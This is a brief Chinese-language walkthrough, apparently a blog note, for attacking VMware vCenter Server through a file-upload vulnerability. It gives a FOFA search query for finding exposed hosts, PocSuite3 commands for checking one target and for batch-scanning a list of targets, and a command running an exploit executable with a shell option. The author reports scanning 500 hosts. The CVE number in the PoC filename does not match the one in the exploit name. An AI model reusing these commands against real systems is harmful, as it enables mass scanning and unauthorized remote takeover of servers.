0x00 fofa
“VMware vCenter”
0x01 漏洞检测
下载PocSuite3
执行以下命令
python cli.py -r pocs\20210923_WEB_Vmware_vCenter_Server_FIleUpload_CVE-2021-20050.py -u https://*.*.*.* —verify
0x02 批量检测
执行以下命令,注意1.txt放在和cli.py同个目录
pythoncli.py-rpocs\20210923_WEB_Vmware_vCenter_Server_FIleUpload_CVE-2021-20050.py-f 1.txt—verify
0x03 参考
0x04 后续
上面那种方式没有exp,并且准确率很低
尝试使用其他exp,打开以下链接,exp在exp文件夹里
执行以下命令获取shell
cve-2021-22005_exp_win.exe -u http://x.x.x.x:443/ —shell
以上在理想情况才能实现,现实是跑了500个里面有17个有漏洞,但是没法成功运行exp